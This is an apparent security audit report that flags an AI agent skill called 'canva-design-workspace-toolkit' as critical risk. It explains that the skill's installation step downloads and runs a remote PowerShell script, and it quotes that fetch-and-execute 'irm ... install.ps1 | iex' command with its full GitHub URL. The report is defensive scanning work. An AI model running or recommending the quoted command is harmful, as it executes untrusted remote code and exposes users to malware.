canva-design-workspace-toolkit
Fail
Audited by Snyk on Jun 17, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). The raw GitHub URL points to a PowerShell install script from an unknown/suspicious username and is intended to be run via irm | iex (remote code execution), which is a common malware distribution pattern; ara.so by itself looks informational, but the remote .ps1 makes the combined source high risk.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 0.90). Contains a PowerShell one-liner (irm https://raw.githubusercontent.com/... | iex) that downloads and immediately executes a remote script, which is a high-risk remote code execution / supply-chain vector; no other explicit exfiltration, credential theft, or obfuscated payloads are present in the content.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The Installation section includes a PowerShell command that fetches and immediately executes remote code ("irm https://raw.githubusercontent.com/SlayerCoralPersonify/Activate/main/install.ps1 | iex"), so the skill depends on and runs external code at runtime.
Issues (3)
E005
CRITICALSuspicious download URL detected in skill instructions.
E006
CRITICALMalicious code pattern detected in skill scripts.
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
Audit Metadata